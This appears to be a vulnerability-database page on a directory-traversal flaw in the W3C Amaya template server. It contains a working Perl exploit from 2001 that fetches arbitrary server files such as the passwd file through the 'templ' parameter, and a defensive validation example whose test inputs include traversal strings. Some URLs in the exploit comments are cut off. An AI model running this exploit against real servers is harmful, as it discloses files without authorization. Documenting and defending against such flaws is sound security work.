Published: 2001-05-03 00:00:00
Revised: 2008-09-05 16:23:42

[Original] Directory traversal vulnerability in Anaya Web development server allows remote attackers to read arbitrary files via a .. (dot dot) attack in the templ parameter.

[CNNVD] W3C Amaya Templates Server sendtemp.pl remote directory traversal vulnerability (CNNVD-200105-031)

        W3C's Amaya is a WYSIWYG web browser and authoring program. It has a component called the template server, which can fetch templates from an Apache web server for use in Amaya-based authoring.

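- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]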

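- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources

- Vulnerability information

W3C Amaya Templates Server sendtemp.pl remote directory traversal vulnerability
Medium severity Unknown
2001-05-03 00:00:00 2005-10-20 00:00:00
        W3C's Amaya is a WYSIWYG web browser and authoring program. It has a component called the template server, which can fetch templates from an Apache web server for use in Amaya-based authoring.

- Advisories and patches


- Vulnerability information (289) Read Access to Files (EDBID:289)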
cgi webapps
2001-03-04 Verified
0 Tom Parker
N/A
#!/usr/bin/perl -w

# A part of the Amaya Web development
# server contains a file disclosure  vulnerability, 
# which allows remote, read access to files 
# on the server's file system,  as whichever 
# user the httpd is running as.
# The Vulnerability is really quite simple..
# When the `templ` argument is passed to
# it adds a link to the chosen stylesheet
# and a META field containing the publication's 
# URL of the new file to the chosen template.
# For example:
# http://localhost/cgi-bin/
# This is all well and good,  however.. 
# There is no sanity checking on the param you pass to the script..
# Ie: my $temp_file = param("templ");
# So by simply issuing a GET to:
# "http://localhost/cgi-bin/"
# The systems file system can be traversed and the passwd file can be read. 
# (Assuming the http daemon hasn't been run under chroot())
# Follows is a simple exploit.. however, it's just as easy 
# to do this manually in your web browser.
# I really couldn't be bothered to format the output in any way,
# It only encourages script kiddies.
# Finally, "l33t hax0r greetz" to..
# ne0h, b0red, loophole, shad0w and the old dL crew..
# Scott, Jim, Mike.. All of the guys at Global Intersec.
# Tom Parker -
# MRX of HHP-Programming (
# Global InterSec INC California - Security Audits, Penetration testing, code auditing.

use IO::Socket;
print qq~
W3.ORG exploit by Tom Parker - tom\
    MRX of HHP-Programming (
	  -  Global InterSec INC California -
~;
if((!defined($ARGV[0]))||(!defined($ARGV[1]))) { print "Usage\: \%filename\.pl \<hostname\> \<file-to-get\>\n"; exit 0; }
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
print $SOCKET "GET /cgi-bin/$ARGV[1]\n";
print "Sent request for $ARGV[1] (http://$ARGV[0]/cgi-bin/\?templ\=$ARGV[1])\n";
while(<$SOCKET>) {
push @DATA, $_;
}

my $woot = join(' ',@DATA);
if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; } 
else { print "@DATA"; }

# [2001-03-04]
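
The check the script's comments say is missing (no sanity checking on the `templ` value) can be written as follows. This is an added example, not code from sendtemp.pl, from W3C or from the exploit author; the function name `resolve_template`, the single-directory template layout and the sample file names are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example, not the sendtemp.pl source. Sample files are constructed.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Return the canonical path of a requested template, or nothing if the
# value is rejected. $root is the only directory templates are served from.
sub resolve_template {
    my ($root, $name) = @_;
    return unless defined $name;

    # Allow-list: one bare file name. No "/", no leading ".", no NUL byte.
    return unless $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;

    my $real_root = realpath($root);
    return unless defined $real_root;

    # The file must exist as a regular file under the template root.
    my $candidate = File::Spec->catfile($real_root, $name);
    return unless -f $candidate;

    # Canonicalise (this resolves symlinks) and confirm the result still
    # sits inside the template root before it is ever opened.
    my $real = realpath($candidate);
    return unless defined $real && index($real, "$real_root/") == 0;

    return $real;
}

# Constructed demo: a temporary template root holding one template.
my $root = tempdir(CLEANUP => 1);
open(my $fh, '>', File::Spec->catfile($root, 'article.html')) or die "create: $!";
print {$fh} "<html></html>\n";
close($fh);

for my $templ ('article.html', '../../../../etc/passwd', '/etc/passwd',
               "article.html\0.txt", '..', 'missing.html') {
    (my $shown = $templ) =~ s/\0/\\0/g;
    my $path = resolve_template($root, $templ);
    printf "%-26s %s\n", $shown, defined($path) ? 'served' : 'rejected';
}
```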

- Vulnerability information

510 Anaya Web templ Variable Traversal Arbitrary File Access
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2001-02-12 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete